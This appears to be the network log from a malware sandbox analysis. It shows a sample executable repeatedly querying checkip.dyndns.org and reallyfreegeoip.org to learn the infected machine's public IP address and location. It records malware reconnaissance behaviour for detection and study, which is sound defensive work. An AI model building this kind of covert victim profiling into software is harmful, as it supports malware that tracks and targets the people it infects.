                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 08:08:38.398200035 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:38 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: 5701afd0388845c1c6f43dbf732936bd
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.949808193.122.130.0807664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 08:08:38.997546911 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 08:08:39.460645914 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:39 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: ef2de852cd31bc783e8caeaf1d2848ac
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.949815193.122.130.0807664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 08:08:40.069653034 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 08:08:40.527565956 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:40 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: 7b468edb7e9940e749e51f7e8e7055c9
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.949753104.21.112.14437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 07:08:32 UTC865INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:32 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Age: 1894101
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    cf-cache-status: HIT
                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wqs2SM5TbaTt4h6EgQvLrNn%2BgDAdZns8z6Fd%2FDT%2FPX7YRAvsIKacbx%2B5rJ1oLTpSDSwM1m%2F%2Fe1N%2FhQAoDgGkvbYgSg0isi7tt%2BNb2MPqEdfd5xtdicqRbCCM2jP6sNT1P2AD7Qvu"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 9003137fd91e727b-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1871&min_rtt=1869&rtt_var=706&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1544156&cwnd=234&unsent_bytes=0&cid=f768c117eba7aa9f&ts=181&x=0"
                                                                                                                    2025-01-11 07:08:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.949759104.21.112.14437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:33 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2025-01-11 07:08:33 UTC865INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:33 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Age: 1894102
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    cf-cache-status: HIT
                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AeVGFuZ0aH8tj2%2BrUZow9YyRC%2By%2BzrebOWMkitoDlClGq4w6%2BIFZ02ayL%2Fq3KczTW8IA00RgwSdGz%2FQUmGkiHRI4ZNvRt2B0F1nIhN28fXFIaEo%2BY4cBd8%2FtQuZkkAr6c0Sfu4Xw"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 90031384aea0729f-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1988&rtt_var=756&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1436301&cwnd=169&unsent_bytes=0&cid=df39ebaad43169ec&ts=190&x=0"
                                                                                                                    2025-01-11 07:08:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.949766104.21.112.14437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 07:08:34 UTC855INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:34 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Age: 1894103
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    cf-cache-status: HIT
                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IdpaRw0Bx9JaE94k43GrjqbaMJOJIC21EGjfCULkaw8IdRg0PdmAZJWmGB1YfTBfkSxxHTpcgdPAEpKs3wzxMbyvncB8QLWUUN%2FxSezNxaRZuN%2FOwyZXkIWbmxe%2B6aVh5Y3T6gYj"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 9003138c690ac34f-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1414&min_rtt=1404&rtt_var=547&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1961047&cwnd=181&unsent_bytes=0&cid=4c3f2420efa4a094&ts=133&x=0"
                                                                                                                    2025-01-11 07:08:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.949776104.21.112.14437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 07:08:35 UTC859INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:35 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Age: 1894104
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    cf-cache-status: HIT
                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pfrrur%2Fetbsdkb6jSCK%2BL8O1Alm%2BjlKSH3pMxYYWEppNxDvzYQCb6VRNYD239V0omIq3uwViUES3otLgqn4OjhU6FST5%2BnqWFFsA45gefIXfSjcNj%2B3wLJxiWQC3myjihAiZMv3m"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 900313932dcf424b-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1551&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1822721&cwnd=248&unsent_bytes=0&cid=f822e08d91c40137&ts=126&x=0"
                                                                                                                    2025-01-11 07:08:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.949784104.21.112.14437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2025-01-11 07:08:36 UTC857INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:36 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Age: 1894105
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    cf-cache-status: HIT
                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ItUUWH6%2BnVF1b3meniiZVfbiLyfffvJgTGnEalGOL%2FZNrj4s4GKNtplgLnotkLuPeptAo2jHGdwwb4iiCNkPjE35Cs%2F2E6KplaX7fysiWGaNuJr3KHZ6z3uQ71zrQKgv%2BYFECWYT"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 90031399fbc2424b-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1597&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1811414&cwnd=248&unsent_bytes=0&cid=4c88da7d407dcc99&ts=155&x=0"
                                                                                                                    2025-01-11 07:08:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.949792104.21.112.14437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:37 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2025-01-11 07:08:37 UTC855INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:37 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Age: 1894107
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    cf-cache-status: HIT
                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kzlp%2BjXMc7cVUdMy1ckJK4qkpdLDv4IyZXMxCEkou3l0QABnI%2FkRK9ud00cNPqQAGrdREIbtRfceHclq7vCEjQ%2BndjRx7PcxCLkGe2L4dcDWiPhXrmbTML7W9zv4j1yeHZdTrml"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 900313a0aa730f5b-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1590&rtt_var=642&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1836477&cwnd=221&unsent_bytes=0&cid=36cedf08dcb4d34f&ts=124&x=0"
                                                                                                                    2025-01-11 07:08:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.949802104.21.112.14437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:38 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2025-01-11 07:08:38 UTC853INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:38 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Age: 1894108
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    cf-cache-status: HIT
                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJ0FMWaa6g6y0wo5p%2FCjVZTBJqe2fpEtAT3eFKqQPIXscWh4lupZW0ENTbk9koASjIqWxmQHgoscy3YmiJCrTzQRAlngLuddLV7rtPG24R6NlIMLyKpcT6VueY23388%2BhrCgWuW8"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 900313a74fc743b3-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1559&rtt_var=596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1820448&cwnd=203&unsent_bytes=0&cid=12839b1e16d6aea2&ts=134&x=0"
                                                                                                                    2025-01-11 07:08:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.949809104.21.112.14437664C:\Users\user\Desktop\x8M2g1Xxhz.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 07:08:39 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2025-01-11 07:08:40 UTC855INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 07:08:40 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Age: 1894109
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    cf-cache-status: HIT
                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gKP1nKh6Dqm2DWTXku6U7T%2FYMaPTNO6aXiRzXYoc5CmtEGjHUg%2B6rnqQjtAdUz671sPUu0yHaxZMNKmyhQ3dIaEh9Z3%2BrnR4jhM9RehYtz6Bk3Wz6BpQN5IjkNcRo8cnV4XBLEnG"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 900313ae0a68424b-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1580&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1848101&cwnd=248&unsent_bytes=0&cid=5ef58477671ded34&ts=145&x=0"
